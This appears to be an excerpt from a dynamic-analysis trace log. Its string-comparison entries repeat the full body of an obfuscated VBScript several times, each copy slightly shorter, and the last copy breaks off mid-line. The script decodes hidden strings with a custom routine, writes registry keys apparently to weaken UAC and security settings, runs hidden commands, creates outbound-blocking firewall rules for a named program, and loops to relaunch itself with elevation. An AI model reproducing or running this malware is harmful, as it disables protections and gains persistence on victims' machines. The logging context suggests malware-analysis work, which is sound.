bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0222.938] wcsncmp (_String1="\"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 21 [0222.938] wcsncmp (_String1="\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 21 [0222.938] wcsncmp (_String1="\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 81 [0222.938] wcsncmp (_String1="\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite 